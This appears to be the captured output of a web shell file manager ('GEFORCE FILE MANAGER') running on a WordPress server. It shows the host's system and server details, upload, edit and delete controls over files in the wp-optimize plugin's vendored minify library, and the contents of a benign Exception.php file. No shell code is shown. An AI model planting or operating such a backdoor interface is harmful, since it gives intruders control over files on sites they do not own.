[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
vendor
/
matthiasmullie
/
minify
/
src
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Exceptions
SET
[ DEL ]
📄 CSS.php
31,622 B
SET
[ EDIT ]
|
[ DEL ]
📄 Exception.php
359 B
SET
[ EDIT ]
|
[ DEL ]
📄 JS.php
40,234 B
SET
[ EDIT ]
|
[ DEL ]
📄 Minify.php
18,726 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Exception.php
<?php /** * Base Exception. * * @deprecated Use Exceptions\BasicException instead * * @author Matthias Mullie <minify@mullie.eu> */ namespace MatthiasMullie\Minify; /** * Base Exception Class. * * @deprecated Use Exceptions\BasicException instead * * @author Matthias Mullie <minify@mullie.eu> */ abstract class Exception extends \Exception {}